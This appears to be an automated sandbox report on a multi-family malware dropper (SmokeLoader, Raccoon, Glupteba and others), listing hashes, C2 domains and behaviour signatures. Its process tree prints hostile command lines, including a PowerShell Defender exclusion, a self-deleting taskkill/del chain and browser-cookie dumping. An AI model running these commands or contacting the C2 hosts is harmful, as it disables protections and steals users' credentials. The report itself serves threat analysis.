Resubmissions
18-03-2021 16:36
210318-gp18cmknhn 1018-03-2021 16:36
210318-c2gfjesvja 1018-03-2021 16:36
210318-vqkv89gzv2 1018-03-2021 16:36
210318-hkbpmljzte 1018-03-2021 16:36
210318-x2ph225zjs 1018-03-2021 16:04
210318-a66favrxcs 10Analysis
-
max time kernel
535s -
max time network
1789s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-03-2021 16:36
General
-
Target
Setup3310.exe
-
Size
381KB
-
MD5
acf61459d6319724ab22cb5a8308d429
-
SHA1
8a5d782e6f31c3005e5e0706a3d266ece492a6cf
-
SHA256
344d7b46385722db4733eee860283c00327c85f28dd76acc996be63f4c4c956e
-
SHA512
d5f38cb8ed500510ba7d466345c854856ec70121683d4b5398651bfd41a7f5f8d754e8fece0bca38e334214d326afa1970b19e79c3d8507bff9d7782df762877
Score
10/10
Malware Config
Extracted
Family
smokeloader
Version
2019
C2
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
rc4.i32
rc4.i32
Extracted
Family
metasploit
Version
windows/single_exec
Extracted
Family
raccoon
Botnet
afefd33a49c7cbd55d417545269920f24c85aa37
Attributes
-
url4cnc
https://telete.in/jagressor_kz
rc4.plain
rc4.plain
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Glupteba Payload 4 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
PlugX
PlugX is a RAT (Remote Access Trojan) that has been around since 2008.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Registers COM server for autorun 1 TTPs
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
Windows security bypass 2 TTPs
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Modifies boot configuration data using bcdedit 15 IoCs
-
Blocklisted process makes network request 4 IoCs
-
Drops file in Drivers directory 10 IoCs
-
Executes dropped EXE 64 IoCs
-
Looks for VMWare Tools registry key 2 TTPs
-
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
UPX packed file 14 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks BIOS information in registry 2 TTPs 7 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
-
Loads dropped DLL 64 IoCs
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 10 IoCs
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 10 IoCs
-
Checks for any installed AV software in registry 1 TTPs 64 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 5 IoCs
-
Drops Chrome extension 4 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Installs/modifies Browser Helper Object 2 TTPs
BHOs are DLL modules which act as plugins for Internet Explorer.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 29 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 10 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 46 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs
-
Suspicious use of SetThreadContext 6 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 37 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 23 IoCs
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 12 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 38 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 5 IoCs
-
Enumerates system info in registry 2 TTPs 26 IoCs
-
GoLang User-Agent 6 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
-
Kills process with taskkill 14 IoCs
-
Modifies Internet Explorer settings 1 TTPs 33 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 64 IoCs
-
Modifies system certificate store 2 TTPs 17 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 64 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 5 IoCs
-
Suspicious behavior: MapViewOfSection 64 IoCs
-
Suspicious behavior: SetClipboardViewer 4 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SetWindowsHookEx 14 IoCs
-
Suspicious use of UnmapMainImage 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-KJI8I.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-KJI8I.tmp\Setup3310.tmp" /SL5="$20118,138429,56832,C:\Users\Admin\AppData\Local\Temp\Setup3310.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-L6H0P.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-L6H0P.tmp\Setup.exe" /Verysilent3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-7D3TQ.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-7D3TQ.tmp\Setup.tmp" /SL5="$20206,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-L6H0P.tmp\Setup.exe" /Verysilent4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\Delta.exe" /Verysilent5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-ONETG.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-ONETG.tmp\Delta.tmp" /SL5="$201F4,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\Delta.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-GOAJI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GOAJI.tmp\Setup.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-GOAJI.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\PictureLAb.exe" /Verysilent5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-CDM2Q.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-CDM2Q.tmp\PictureLAb.tmp" /SL5="$301F4,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-J848Q.tmp\PictureLAb.exe" /Verysilent6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-5REP7.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-5REP7.tmp\Setup.exe" /VERYSILENT7⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-5JLPF.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-5JLPF.tmp\Setup.tmp" /SL5="$60074,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-5REP7.tmp\Setup.exe" /VERYSILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-E3EBL.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-E3EBL.tmp\HGT.exe" /S /UID=lab2149⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Common Files\GUNZKFQBZY\prolab.exe"C:\Program Files\Common Files\GUNZKFQBZY\prolab.exe" /VERYSILENT10⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-KKDDV.tmp\prolab.tmp"C:\Users\Admin\AppData\Local\Temp\is-KKDDV.tmp\prolab.tmp" /SL5="$401D2,575243,216576,C:\Program Files\Common Files\GUNZKFQBZY\prolab.exe" /VERYSILENT11⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
-
-
-
C:\Users\Admin\AppData\Local\Temp\35-43ad2-831-227be-d7f3b9ae474a2\Rugomaevoki.exe"C:\Users\Admin\AppData\Local\Temp\35-43ad2-831-227be-d7f3b9ae474a2\Rugomaevoki.exe"10⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\f0ufg3oy.k3m\gaooo.exe & exit11⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\f0ufg3oy.k3m\gaooo.exeC:\Users\Admin\AppData\Local\Temp\f0ufg3oy.k3m\gaooo.exe12⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵
- Executes dropped EXE
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nwf1xvbe.fiu\md7_7dfj.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\nwf1xvbe.fiu\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\nwf1xvbe.fiu\md7_7dfj.exe12⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\znhtj3hc.0po\askinstall29.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\znhtj3hc.0po\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\znhtj3hc.0po\askinstall29.exe12⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe13⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe14⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dpllrgre.1a5\customer4.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\dpllrgre.1a5\customer4.exeC:\Users\Admin\AppData\Local\Temp\dpllrgre.1a5\customer4.exe12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\main.exe"13⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b firefox14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b chrome14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\parse.exeparse.exe -f json -b edge14⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\d5t4jeai.5ex\HookSetp.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\d5t4jeai.5ex\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\d5t4jeai.5ex\HookSetp.exe12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\ProgramData\8445151.92"C:\ProgramData\8445151.92"13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\ProgramData\4620154.50"C:\ProgramData\4620154.50"13⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\ProgramData\Windows Host\Windows Host.exe"C:\ProgramData\Windows Host\Windows Host.exe"14⤵
- Executes dropped EXE
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uyzexdzq.pyc\GcleanerWW.exe /mixone & exit11⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gr05sz13.utu\privacytools5.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\gr05sz13.utu\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\gr05sz13.utu\privacytools5.exe12⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\gr05sz13.utu\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\gr05sz13.utu\privacytools5.exe13⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lipi2jdf.nbv\setup.exe /8-2222 & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\lipi2jdf.nbv\setup.exeC:\Users\Admin\AppData\Local\Temp\lipi2jdf.nbv\setup.exe /8-222212⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Hidden-Thunder"13⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Program Files (x86)\Hidden-Thunder\7za.exe"C:\Program Files (x86)\Hidden-Thunder\7za.exe" e -p154.61.71.51 winamp-plugins.7z13⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Hidden-Thunder\setup.exe" -map "C:\Program Files (x86)\Hidden-Thunder\WinmonProcessMonitor.sys""13⤵
-
C:\Program Files (x86)\Hidden-Thunder\setup.exe"C:\Program Files (x86)\Hidden-Thunder\setup.exe" -map "C:\Program Files (x86)\Hidden-Thunder\WinmonProcessMonitor.sys"14⤵
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
-
-
-
C:\Program Files (x86)\Hidden-Thunder\7za.exe"C:\Program Files (x86)\Hidden-Thunder\7za.exe" e -p154.61.71.51 winamp.7z13⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Hidden-Thunder\setup.exe"C:\Program Files (x86)\Hidden-Thunder\setup.exe" /8-222213⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4xluz2fh.ope\MultitimerFour.exe & exit11⤵
-
C:\Users\Admin\AppData\Local\Temp\4xluz2fh.ope\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\4xluz2fh.ope\MultitimerFour.exe12⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\4L5HLNWXAD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4L5HLNWXAD\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10413⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\4L5HLNWXAD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4L5HLNWXAD\multitimer.exe" 1 3.1616085481.605381e99dd96 10414⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\4L5HLNWXAD\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\4L5HLNWXAD\multitimer.exe" 2 3.1616085481.605381e99dd9615⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1yf4bjuo5ps\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\1yf4bjuo5ps\Setup3310.exe" /Verysilent /subid=57716⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-8Q1VS.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-8Q1VS.tmp\Setup3310.tmp" /SL5="$B00FC,138429,56832,C:\Users\Admin\AppData\Local\Temp\1yf4bjuo5ps\Setup3310.exe" /Verysilent /subid=57717⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
-
C:\Users\Admin\AppData\Local\Temp\is-GNJA5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-GNJA5.tmp\Setup.exe" /Verysilent18⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-5T8P5.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-5T8P5.tmp\Setup.tmp" /SL5="$30512,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-GNJA5.tmp\Setup.exe" /Verysilent19⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\Delta.exe" /Verysilent20⤵
-
C:\Users\Admin\AppData\Local\Temp\is-DAU6A.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-DAU6A.tmp\Delta.tmp" /SL5="$10592,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\Delta.exe" /Verysilent21⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-49B44.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-49B44.tmp\Setup.exe" /VERYSILENT22⤵
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-49B44.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit23⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im Setup.exe /f24⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 624⤵
- Delays execution with timeout.exe
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\PictureLAb.exe" /Verysilent20⤵
-
C:\Users\Admin\AppData\Local\Temp\is-SCS2H.tmp\PictureLAb.tmp"C:\Users\Admin\AppData\Local\Temp\is-SCS2H.tmp\PictureLAb.tmp" /SL5="$20592,1574549,56832,C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\PictureLAb.exe" /Verysilent21⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-LMCGU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-LMCGU.tmp\Setup.exe" /VERYSILENT22⤵
-
C:\Users\Admin\AppData\Local\Temp\is-K5I0T.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-K5I0T.tmp\Setup.tmp" /SL5="$40496,298214,214528,C:\Users\Admin\AppData\Local\Temp\is-LMCGU.tmp\Setup.exe" /VERYSILENT23⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-SJ034.tmp\HGT.exe"C:\Users\Admin\AppData\Local\Temp\is-SJ034.tmp\HGT.exe" /S /UID=lab21424⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\c7-e2bf3-4fb-2079a-2217a68f222c0\Pyshaepudaeho.exe"C:\Users\Admin\AppData\Local\Temp\c7-e2bf3-4fb-2079a-2217a68f222c0\Pyshaepudaeho.exe"25⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\be30kosd.c03\gaooo.exe & exit26⤵
-
C:\Users\Admin\AppData\Local\Temp\be30kosd.c03\gaooo.exeC:\Users\Admin\AppData\Local\Temp\be30kosd.c03\gaooo.exe27⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt28⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4y3hdf53.bfu\md7_7dfj.exe & exit26⤵
-
C:\Users\Admin\AppData\Local\Temp\4y3hdf53.bfu\md7_7dfj.exeC:\Users\Admin\AppData\Local\Temp\4y3hdf53.bfu\md7_7dfj.exe27⤵
- Checks whether UAC is enabled
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ekdm0gsf.lrq\askinstall29.exe & exit26⤵
-
C:\Users\Admin\AppData\Local\Temp\ekdm0gsf.lrq\askinstall29.exeC:\Users\Admin\AppData\Local\Temp\ekdm0gsf.lrq\askinstall29.exe27⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe28⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe29⤵
- Kills process with taskkill
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ncot2bil.hwx\customer4.exe & exit26⤵
-
C:\Users\Admin\AppData\Local\Temp\ncot2bil.hwx\customer4.exeC:\Users\Admin\AppData\Local\Temp\ncot2bil.hwx\customer4.exe27⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"28⤵
- Loads dropped DLL
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0sl4kuco.aee\HookSetp.exe & exit26⤵
-
C:\Users\Admin\AppData\Local\Temp\0sl4kuco.aee\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\0sl4kuco.aee\HookSetp.exe27⤵
-
C:\ProgramData\5821330.64"C:\ProgramData\5821330.64"28⤵
-
-
C:\ProgramData\4536431.49"C:\ProgramData\4536431.49"28⤵
- Suspicious behavior: SetClipboardViewer
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xzyq113l.asr\GcleanerWW.exe /mixone & exit26⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\invpziey.4lz\privacytools5.exe & exit26⤵
-
C:\Users\Admin\AppData\Local\Temp\invpziey.4lz\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\invpziey.4lz\privacytools5.exe27⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\invpziey.4lz\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\invpziey.4lz\privacytools5.exe28⤵
- Loads dropped DLL
- Suspicious behavior: MapViewOfSection
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\q4z3xslt.e2o\setup.exe /8-2222 & exit26⤵
-
C:\Users\Admin\AppData\Local\Temp\q4z3xslt.e2o\setup.exeC:\Users\Admin\AppData\Local\Temp\q4z3xslt.e2o\setup.exe /8-222227⤵
- Loads dropped DLL
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Wispy-Brook"28⤵
-
-
C:\Program Files (x86)\Wispy-Brook\7za.exe"C:\Program Files (x86)\Wispy-Brook\7za.exe" e -p154.61.71.51 winamp-plugins.7z28⤵
- Drops file in Program Files directory
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Wispy-Brook\setup.exe" -map "C:\Program Files (x86)\Wispy-Brook\WinmonProcessMonitor.sys""28⤵
-
C:\Program Files (x86)\Wispy-Brook\setup.exe"C:\Program Files (x86)\Wispy-Brook\setup.exe" -map "C:\Program Files (x86)\Wispy-Brook\WinmonProcessMonitor.sys"29⤵
- Suspicious behavior: LoadsDriver
-
-
-
C:\Program Files (x86)\Wispy-Brook\7za.exe"C:\Program Files (x86)\Wispy-Brook\7za.exe" e -p154.61.71.51 winamp.7z28⤵
-
-
C:\Program Files (x86)\Wispy-Brook\setup.exe"C:\Program Files (x86)\Wispy-Brook\setup.exe" /8-222228⤵
-
C:\Program Files (x86)\Wispy-Brook\setup.exe"C:\Program Files (x86)\Wispy-Brook\setup.exe" /8-222229⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\444jesi0.yu5\MultitimerFour.exe & exit26⤵
-
C:\Users\Admin\AppData\Local\Temp\444jesi0.yu5\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\444jesi0.yu5\MultitimerFour.exe27⤵
-
C:\Users\Admin\AppData\Local\Temp\RHDD1JFYQJ\setups.exe"C:\Users\Admin\AppData\Local\Temp\RHDD1JFYQJ\setups.exe" ll28⤵
-
